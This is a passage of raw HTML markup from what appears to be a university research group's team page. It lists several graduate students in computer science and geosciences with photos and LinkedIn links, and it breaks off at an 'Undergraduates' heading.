class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Ph.D. Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c104-outer\">\n            <div data-colibri-id=\"182-c104\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c104 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c105\" class=\"d-block style-854 style-local-182-c105 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c105-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c105-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c106\" class=\"h-global-transition-all h-heading style-850 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c106\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-text h-text-component style-851 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-902 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"style-855 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-1663377340901.jpg\" class=\"wp-image-1657 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c143\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c143 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c155\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c155 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c156-outer\">\n            <div data-colibri-id=\"182-c156\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c156 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c157\" class=\"h-global-transition-all h-heading style-844 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c157\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          